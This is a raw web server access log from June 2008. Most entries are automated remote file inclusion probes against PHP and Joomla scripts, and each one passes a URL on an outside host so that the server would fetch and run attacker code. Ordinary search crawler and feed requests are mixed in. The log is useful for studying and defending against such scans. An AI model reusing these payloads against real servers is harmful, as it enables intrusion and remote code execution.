200.6.153.2 - - [08/Jun/2008:17:00:53 -0700] "GET /logs/inc/formmail.inc.php?script_root=http://br0z.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.notahamsandwich.com"
200.6.153.2 - - [08/Jun/2008:17:00:53 -0700] "GET /inc/formmail.inc.php?script_root=http://br0z.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.notahamsandwich.com"
200.62.54.120 - - [08/Jun/2008:17:01:47 -0700] "GET /logs/access.log/send_reminders.php?includedir=http://yourmynumberone.com/mx5club/images/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.notahamsandwich.com"
207.23.252.129 - - [08/Jun/2008:17:01:54 -0700] "GET /logs/ HTTP/1.1" 200 7659 "-" "Mozilla/5.0 (compatible; woriobot support [at] worio [dot] com +http://worio.com)" "www.notahamsandwich.com"
201.25.155.27 - - [08/Jun/2008:17:06:13 -0700] "GET /logs/access_080519.log//faqsupport/samplefaqsupport.php?path[docroot]=http://nmbsquad-ng.110mb.com/idb.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.notahamsandwich.com"
201.25.155.27 - - [08/Jun/2008:17:06:13 -0700] "GET //faqsupport/samplefaqsupport.php?path[docroot]=http://nmbsquad-ng.110mb.com/idb.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.notahamsandwich.com"
201.25.155.27 - - [08/Jun/2008:17:06:14 -0700] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=http://nmbsquad-ng.110mb.com/idb.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.notahamsandwich.com"
201.25.155.27 - - [08/Jun/2008:17:10:46 -0700] "GET /logs/access.log//faqsupport/samplefaqsupport.php?path[docroot]=http://nmbsquad-ng.110mb.com/idb.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.notahamsandwich.com"
216.127.70.91 - - [08/Jun/2008:17:10:51 -0700] "GET /logs/access.log//include/admin.lib.inc.php?site_path=http://eskentx.kit.net/kang.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.notahamsandwich.com"
216.127.70.91 - - [08/Jun/2008:17:10:51 -0700] "GET //include/admin.lib.inc.php?site_path=http://eskentx.kit.net/kang.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.notahamsandwich.com"
216.127.70.91 - - [08/Jun/2008:17:10:51 -0700] "GET /logs//include/admin.lib.inc.php?site_path=http://eskentx.kit.net/kang.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.notahamsandwich.com"
213.194.149.215 - - [08/Jun/2008:17:10:54 -0700] "GET /logs/access.log//doceboCms/class/class.dashboard_cms.php?where_framework=http://www.ciprof.it/readme.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.notahamsandwich.com"
213.194.149.215 - - [08/Jun/2008:17:10:54 -0700] "GET //doceboCms/class/class.dashboard_cms.php?where_framework=http://www.ciprof.it/readme.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.notahamsandwich.com"
213.194.149.215 - - [08/Jun/2008:17:10:54 -0700] "GET /logs//doceboCms/class/class.dashboard_cms.php?where_framework=http://www.ciprof.it/readme.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.notahamsandwich.com"
72.14.199.32 - - [08/Jun/2008:17:18:16 -0700] "GET /?feed=rss2 HTTP/1.1" 200 514 "-" "Feedfetcher-Google; (+http://www.google.com/feedfetcher.html; 6 subscribers; feed-id=2879958457252815395)" "blog.notahamsandwich.com"
195.32.96.7 - - [08/Jun/2008:17:46:56 -0700] "GET /logs/access.log/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://h1.ripway.com/i3/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.notahamsandwich.com"
195.32.96.7 - - [08/Jun/2008:17:46:57 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://h1.ripway.com/i3/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.notahamsandwich.com"
195.32.96.7 - - [08/Jun/2008:17:46:57 -0700] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://h1.ripway.com/i3/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.notahamsandwich.com"
72.14.199.100 - - [08/Jun/2008:18:18:16 -0700] "GET /?feed=rss2 HTTP/1.1" 200 514 "-" "Feedfetcher-Google; (+http://www.google.com/feedfetcher.html; 6 subscribers; feed-id=2879958457252815395)" "blog.notahamsandwich.com"
72.29.83.181 - - [08/Jun/2008:18:30:38 -0700] "GET /logs/access.log//component/option,com_sitemap/Itemid,50/component/option,com_sitemap/Itemid,53//component/option,com_sitemap/Itemid,79//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://musicampus.net/alb?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.notahamsandwich.com"
72.29.83.181 - - [08/Jun/2008:18:30:38 -0700] "GET //component/option,com_sitemap/Itemid,50/component/option,com_sitemap/Itemid,53//component/option,com_sitemap/Itemid,79//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://musicampus.net/alb?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.notahamsandwich.com"
72.29.83.181 - - [08/Jun/2008:18:30:38 -0700] "GET /logs//component/option,com_sitemap/Itemid,50/component/option,com_sitemap/Itemid,53//component/option,com_sitemap/Itemid,79//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://musicampus.net/alb?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.notahamsandwich.com"
65.98.98.2 - - [08/Jun/2008:18:32:39 -0700] "GET /logs/access.log//component/option,com_sitemap/Itemid,50/component/option,com_sitemap/Itemid,53//component/option,com_sitemap/Itemid,79//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.musicampus.net/r0x.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.notahamsandwich.com"
65.98.98.2 - - [08/Jun/2008:18:32:39 -0700] "GET //component/option,com_sitemap/Itemid,50/component/option,com_sitemap/Itemid,53//component/option,com_sitemap/Itemid,79//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.musicampus.net/r0x.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.notahamsandwich.com"
65.98.98.2 - - [08/Jun/2008:18:32:39 -0700] "GET /logs//component/option,com_sitemap/Itemid,50/component/option,com_sitemap/Itemid,53//component/option,com_sitemap/Itemid,79//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.musicampus.net/r0x.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.notahamsandwich.com"
78.110.50.106 - - [08/Jun/2008:18:37:36 -0700] "GET /logs//component/option,com_sitemap/Itemid,50/component/option,com_sitemap/Itemid,53//component/option,com_sitemap/Itemid,79//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.rotary-canelli-nizza.org/r0x.id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)" "www.notahamsandwich.com"
78.110.50.106 - - [08/Jun/2008:18:37:36 -0700] "GET //component/option,com_sitemap/Itemid,50/component/option,com_sitemap/Itemid,53//component/option,com_sitemap/Itemid,79//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.rotary-canelli-nizza.org/r0x.id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)" "www.notahamsandwich.com"
72.29.83.181 - - [08/Jun/2008:18:41:46 -0700] "GET /logs/access.log//component/option,com_sitemap/Itemid,50/component/option,com_sitemap/Itemid,53//component/option,com_sitemap/Itemid,79//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://musicampus.net/alb?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.notahamsandwich.com"
72.29.83.181 - - [08/Jun/2008:18:41:46 -0700] "GET //component/option,com_sitemap/Itemid,50/component/option,com_sitemap/Itemid,53//component/option,com_sitemap/Itemid,79//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://musicampus.net/alb?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.notahamsandwich.com"
72.29.83.181 - - [08/Jun/2008:18:41:46 -0700] "GET /logs//component/option,com_sitemap/Itemid,50/component/option,com_sitemap/Itemid,53//component/option,com_sitemap/Itemid,79//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://musicampus.net/alb?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.notahamsandwich.com"
72.29.73.71 - - [08/Jun/2008:18:58:48 -0700] "GET /logs/access.log//component/option,com_sitemap/Itemid,50/component/option,com_sitemap/Itemid,53//component/option,com_sitemap/Itemid,79//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://199.238.139.160/images/rox.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.notahamsandwich.com"
72.29.73.71 - - [08/Jun/2008:18:58:48 -0700] "GET //component/option,com_sitemap/Itemid,50/component/option,com_sitemap/Itemid,53//component/option,com_sitemap/Itemid,79//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://199.238.139.160/images/rox.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.notahamsandwich.com"
72.29.73.71 - - [08/Jun/2008:18:58:48 -0700] "GET /logs//component/option,com_sitemap/Itemid,50/component/option,com_sitemap/Itemid,53//component/option,com_sitemap/Itemid,79//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://199.238.139.160/images/rox.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.notahamsandwich.com"
83.133.125.202 - - [08/Jun/2008:19:11:53 -0700] "GET / HTTP/1.1" 200 912 "http://www.BigFinder.de/index.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; de)" "www.notahamsandwich.com"
72.14.199.100 - - [08/Jun/2008:19:18:16 -0700] "GET /?feed=rss2 HTTP/1.1" 200 514 "-" "Feedfetcher-Google; (+http://www.google.com/feedfetcher.html; 6 subscribers; feed-id=2879958457252815395)" "blog.notahamsandwich.com"
193.111.11.7 - - [08/Jun/2008:19:35:10 -0700] "GET /logs/access.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://ieras.ru/tmp/mid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.notahamsandwich.com"
193.111.11.7 - - [08/Jun/2008:19:35:18 -0700] "GET /logs//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://ieras.ru/tmp/mid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.notahamsandwich.com"
88.131.106.8 - - [08/Jun/2008:20:03:16 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "Speedy Spider (http://www.entireweb.com/about/search_tech/speedy_spider/)" "www.notahamsandwich.com"
88.131.106.8 - - [08/Jun/2008:20:03:16 -0700] "GET / HTTP/1.0" 200 896 "-" "Speedy Spider (http://www.entireweb.com/about/search_tech/speedy_spider/)" "www.notahamsandwich.com"
74.6.18.233 - - [08/Jun/2008:20:11:20 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.notahamsandwich.com"
74.6.18.233 - - [08/Jun/2008:20:11:20 -0700] "GET /blog/?N=A HTTP/1.0" 200 506 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.notahamsandwich.com"
72.14.199.80 - - [08/Jun/2008:20:18:16 -0700] "GET /?feed=rss2 HTTP/1.1" 200 514 "-" "Feedfetcher-Google; (+http://www.google.com/feedfetcher.html; 6 subscribers; feed-id=2879958457252815395)" "blog.notahamsandwich.com"
200.126.108.198 - - [08/Jun/2008:20:23:56 -0700] "GET /logs/access.log/scanhttp://anakkozz.justfree.com/Gie/pp.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.notahamsandwich.com"
200.126.108.198 - - [08/Jun/2008:20:23:57 -0700] "GET /scanhttp://anakkozz.justfree.com/Gie/pp.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.notahamsandwich.com"
200.126.108.198 - - [08/Jun/2008:20:23:57 -0700] "GET /logs/scanhttp://anakkozz.justfree.com/Gie/pp.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.notahamsandwich.com"
200.126.108.198 - - [08/Jun/2008:20:24:16 -0700] "GET /logs/access.log/scanhttp://anakkozz.justfree.com/Gie/pp.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.notahamsandwich.com"
200.126.108.198 - - [08/Jun/2008:20:24:17 -0700] "GET /scanhttp://anakkozz.justfree.com/Gie/pp.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.notahamsandwich.com"
200.126.108.198 - - [08/Jun/2008:20:24:17 -0700] "GET /logs/scanhttp://anakkozz.justfree.com/Gie/pp.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.notahamsandwich.com"
216.167.156.20 - - [08/Jun/2008:20:29:05 -0700] "GET /logs/access.log/scanhttp://users5.nofeehost.com/maniezan/iyes.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.notahamsandwich.com"
216.167.156.20 - - [08/Jun/2008:20:29:08 -0700] "GET /scanhttp://users5.nofeehost.com/maniezan/iyes.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.notahamsandwich.com"
216.167.156.20 - - [08/Jun/2008:20:29:08 -0700] "GET /logs/scanhttp://users5.nofeehost.com/maniezan/iyes.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.notahamsandwich.com"
216.167.156.20 - - [08/Jun/2008:20:29:16 -0700] "GET /logs/access.log/scanhttp://users5.nofeehost.com/maniezan/iyes.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.notahamsandwich.com"
216.167.156.20 - - [08/Jun/2008:20:29:16 -0700] "GET /scanhttp://users5.nofeehost.com/maniezan/iyes.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.notahamsandwich.com"
216.167.156.20 - - [08/Jun/2008:20:29:16 -0700] "GET /logs/scanhttp://users5.nofeehost.com/maniezan/iyes.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.notahamsandwich.com"
216.167.156.20 - - [08/Jun/2008:20:29:17 -0700] "GET /logs/access.log/scanhttp://users5.nofeehost.com/maniezan/iyes.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.notahamsandwich.com"
216.167.156.20 - - [08/Jun/2008:20:29:17 -0700] "GET /scanhttp://users5.nofeehost.com/maniezan/iyes.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.notahamsandwich.com"
216.167.156.20 - - [08/Jun/2008:20:29:17 -0700] "GET /logs/scanhttp://users5.nofeehost.com/maniezan/iyes.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.notahamsandwich.com"
216.167.156.20 - - [08/Jun/2008:20:29:48 -0700] "GET /logs/access.log/scanhttp://users5.nofeehost.com/maniezan/iyes.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.notahamsandwich.com"
216.167.156.20 - - [08/Jun/2008:20:29:49 -0700] "GET /scanhttp://users5.nofeehost.com/maniezan/iyes.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.notahamsandwich.com"
216.167.156.20 - - [08/Jun/2008:20:29:52 -0700] "GET /logs/scanhttp://users5.nofeehost.com/maniezan/iyes.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.notahamsandwich.com"
216.167.156.20 - - [08/Jun/2008:20:30:49 -0700] "GET /logs/access.log/scanhttp://users5.nofeehost.com/maniezan/iyes.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.notahamsandwich.com"
216.167.156.20 - - [08/Jun/2008:20:30:52 -0700] "GET /scanhttp://users5.nofeehost.com/maniezan/iyes.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.notahamsandwich.com"
216.167.156.20 - - [08/Jun/2008:20:30:52 -0700] "GET /logs/scanhttp://users5.nofeehost.com/maniezan/iyes.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.notahamsandwich.com"
74.6.18.233 - - [08/Jun/2008:20:31:37 -0700] "GET /blog/?D=A HTTP/1.0" 200 506 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.notahamsandwich.com"
74.53.196.178 - - [08/Jun/2008:20:33:27 -0700] "GET //ws/login.php?noSet=0&includedir=http://o-x-r-a-n-a.ru/forum/language/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)" "www.notahamsandwich.com"
74.53.196.178 - - [08/Jun/2008:20:33:27 -0700] "GET /logs//ws/login.php?noSet=0&includedir=http://o-x-r-a-n-a.ru/forum/language/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)" "www.notahamsandwich.com"
62.140.73.234 - - [08/Jun/2008:20:37:19 -0700] "GET //ws/login.php?noSet=0&includedir=http://o-x-r-a-n-a.ru/forum/language/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20051002 Firefox/1.6a1" "www.notahamsandwich.com"
62.140.73.234 - - [08/Jun/2008:20:37:19 -0700] "GET /logs//ws/login.php?noSet=0&includedir=http://o-x-r-a-n-a.ru/forum/language/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20051002 Firefox/1.6a1" "www.notahamsandwich.com"
206.168.112.10 - - [08/Jun/2008:20:46:38 -0700] "GET /logs/ashnews.php?pathtoashnews=http://www.daviestattoo.com.br/sc.txt??????? HTTP/1.0" 404 275 "-" "libwww-perl/5.43" "www.notahamsandwich.com"
206.168.112.10 - - [08/Jun/2008:20:46:39 -0700] "GET /ashnews.php?pathtoashnews=http://www.daviestattoo.com.br/sc.txt??????? HTTP/1.0" 404 275 "-" "libwww-perl/5.43" "www.notahamsandwich.com"
213.194.149.215 - - [08/Jun/2008:21:14:08 -0700] "GET /index.php/component/option,com_juser/components/com_juser/xajak_functions.php?mosConfig_absolute_path=http://www.ciprof.it/readme.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.notahamsandwich.com"
213.194.149.215 - - [08/Jun/2008:21:14:08 -0700] "GET /logs/index.php/component/option,com_juser/components/com_juser/xajak_functions.php?mosConfig_absolute_path=http://www.ciprof.it/readme.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.notahamsandwich.com"
213.194.149.215 - - [08/Jun/2008:21:14:54 -0700] "GET /logs/access.log/index.php/component/option,com_juser/components/com_juser/xajak_functions.php?mosConfig_absolute_path=http://www.ciprof.it/readme.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.notahamsandwich.com"
72.14.199.72 - - [08/Jun/2008:21:18:16 -0700] "GET /?feed=rss2 HTTP/1.1" 200 514 "-" "Feedfetcher-Google; (+http://www.google.com/feedfetcher.html; 6 subscribers; feed-id=2879958457252815395)" "blog.notahamsandwich.com"
66.249.65.211 - - [08/Jun/2008:21:28:26 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "blog.notahamsandwich.com"
66.249.65.211 - - [08/Jun/2008:21:28:26 -0700] "GET / HTTP/1.1" 200 514 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "blog.notahamsandwich.com"
72.14.199.80 - - [08/Jun/2008:22:18:16 -0700] "GET /?feed=rss2 HTTP/1.1" 200 514 "-" "Feedfetcher-Google; (+http://www.google.com/feedfetcher.html; 6 subscribers; feed-id=2879958457252815395)" "blog.notahamsandwich.com"
74.6.18.233 - - [08/Jun/2008:23:01:02 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.notahamsandwich.com"
74.6.18.233 - - [08/Jun/2008:23:01:03 -0700] "GET /tmp/?S=A HTTP/1.0" 200 504 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.notahamsandwich.com"
74.6.18.233 - - [08/Jun/2008:23:04:43 -0700] "GET /tmp/?S=D HTTP/1.0" 200 504 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.notahamsandwich.com"
67.195.37.90 - - [08/Jun/2008:23:05:41 -0700] "GET /tmp/ HTTP/1.0" 200 504 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.notahamsandwich.com"
202.142.215.151 - - [08/Jun/2008:23:09:10 -0700] "GET /logs/access.log//skin/zero_vote/error.php?dir=http://www.freelance.eu/graphics/robot.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.notahamsandwich.com"
67.195.37.90 - - [08/Jun/2008:23:09:10 -0700] "GET /tmp/?D=A HTTP/1.0" 200 504 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.notahamsandwich.com"
202.142.215.151 - - [08/Jun/2008:23:09:11 -0700] "GET //skin/zero_vote/error.php?dir=http://www.freelance.eu/graphics/robot.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.notahamsandwich.com"
202.142.215.151 - - [08/Jun/2008:23:09:11 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://www.freelance.eu/graphics/robot.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.notahamsandwich.com"
67.195.37.90 - - [08/Jun/2008:23:10:50 -0700] "GET /tmp/?M=A HTTP/1.0" 200 504 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.notahamsandwich.com"
67.195.37.90 - - [08/Jun/2008:23:11:05 -0700] "GET /tmp/?N=D HTTP/1.0" 200 504 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.notahamsandwich.com"
72.14.199.38 - - [08/Jun/2008:23:18:16 -0700] "GET /?feed=rss2 HTTP/1.1" 200 514 "-" "Feedfetcher-Google; (+http://www.google.com/feedfetcher.html; 6 subscribers; feed-id=2879958457252815395)" "blog.notahamsandwich.com"
216.167.156.20 - - [08/Jun/2008:23:20:08 -0700] "GET /logs/access.log/scanhttp://users5.nofeehost.com/maniezan/iyes.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.notahamsandwich.com"
216.167.156.20 - - [08/Jun/2008:23:20:08 -0700] "GET /scanhttp://users5.nofeehost.com/maniezan/iyes.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.notahamsandwich.com"
216.167.156.20 - - [08/Jun/2008:23:20:28 -0700] "GET /logs/access_080519.log/scanhttp://users5.nofeehost.com/maniezan/iyes.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.notahamsandwich.com"
74.6.18.227 - - [08/Jun/2008:23:21:30 -0700] "GET /?p=120 HTTP/1.0" 200 498 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "blog.notahamsandwich.com"
66.59.88.19 - - [09/Jun/2008:00:06:00 -0700] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=ftp://77.91.227.68/upload/tmp/1422423437/24224234310/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.notahamsandwich.com"
66.59.88.19 - - [09/Jun/2008:00:06:00 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=ftp://77.91.227.68/upload/tmp/1422423437/24224234310/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.notahamsandwich.com"
74.53.240.146 - - [09/Jun/2008:00:08:15 -0700] "GET /logs//inc/formmail.inc.php?script_root=http://ieras.ru/tmp/mid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.notahamsandwich.com"
74.53.240.146 - - [09/Jun/2008:00:08:15 -0700] "GET //inc/formmail.inc.php?script_root=http://ieras.ru/tmp/mid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.notahamsandwich.com"
74.53.240.146 - - [09/Jun/2008:00:08:38 -0700] "GET /logs//inc/formmail.inc.php?script_root=http://ieras.ru/tmp/mid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.notahamsandwich.com"
74.53.240.146 - - [09/Jun/2008:00:08:39 -0700] "GET //inc/formmail.inc.php?script_root=http://ieras.ru/tmp/mid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.notahamsandwich.com"
74.53.240.146 - - [09/Jun/2008:00:10:05 -0700] "GET /logs//inc/formmail.inc.php?script_root=http://www.gooteo.com/adpics/test.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.notahamsandwich.com"
74.53.240.146 - - [09/Jun/2008:00:10:05 -0700] "GET //inc/formmail.inc.php?script_root=http://www.gooteo.com/adpics/test.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.notahamsandwich.com"
219.91.69.230 - - [09/Jun/2008:00:17:31 -0700] "GET / HTTP/1.1" 200 912 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows NT; DigExt; DTS Agent" "www.notahamsandwich.com"
72.14.199.80 - - [09/Jun/2008:00:18:16 -0700] "GET /?feed=rss2 HTTP/1.1" 200 514 "-" "Feedfetcher-Google; (+http://www.google.com/feedfetcher.html; 6 subscribers; feed-id=2879958457252815395)" "blog.notahamsandwich.com"
64.237.57.194 - - [09/Jun/2008:00:27:42 -0700] "GET / HTTP/1.1" 200 912 "-" "Mozilla/5.0 (MrCarlito-0.1 http://www.mrcarlito.com/spider.html)" "notahamsandwich.com"
67.195.37.90 - - [09/Jun/2008:00:36:23 -0700] "GET /tmp/?S=A HTTP/1.0" 200 504 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.notahamsandwich.com"
213.194.149.215 - - [09/Jun/2008:00:42:42 -0700] "GET /logs//content/multithumb/multithumb?mosConfig_absolute_path=http://www.ciprof.it/readme.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.notahamsandwich.com"
213.194.149.215 - - [09/Jun/2008:00:42:42 -0700] "GET //content/multithumb/multithumb?mosConfig_absolute_path=http://www.ciprof.it/readme.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.notahamsandwich.com"
213.194.149.215 - - [09/Jun/2008:00:46:51 -0700] "GET /logs/access.log//content/multithumb/multithumb?mosConfig_absolute_path=http://www.ciprof.it/readme.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.notahamsandwich.com"
66.59.88.19 - - [09/Jun/2008:00:50:20 -0700] "GET /logs/access.log/components/com_galleria/galleria.html.php?mosConfig_absolute_path=ftp://77.91.227.68/upload/tmp/1422423437/24224234310/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.notahamsandwich.com"
62.140.19.56 - - [09/Jun/2008:00:55:53 -0700] "GET /logs//inc/errors.php?error=http://www.fightersoft.ro/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)" "www.notahamsandwich.com"
62.140.19.56 - - [09/Jun/2008:00:55:54 -0700] "GET //inc/errors.php?error=http://www.fightersoft.ro/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)" "www.notahamsandwich.com"
72.14.199.86 - - [09/Jun/2008:01:18:16 -0700] "GET /?feed=rss2 HTTP/1.1" 200 514 "-" "Feedfetcher-Google; (+http://www.google.com/feedfetcher.html; 6 subscribers; feed-id=2879958457252815395)" "blog.notahamsandwich.com"
70.86.5.10 - - [09/Jun/2008:01:26:33 -0700] "GET /administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://busway.ueuo.com/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.notahamsandwich.com"
70.86.5.10 - - [09/Jun/2008:01:26:33 -0700] "GET /logs/administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://busway.ueuo.com/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.notahamsandwich.com"
70.86.5.10 - - [09/Jun/2008:01:26:43 -0700] "GET /administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://sobangnara.com/board/data/.init/est.txt??? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)" "www.notahamsandwich.com"
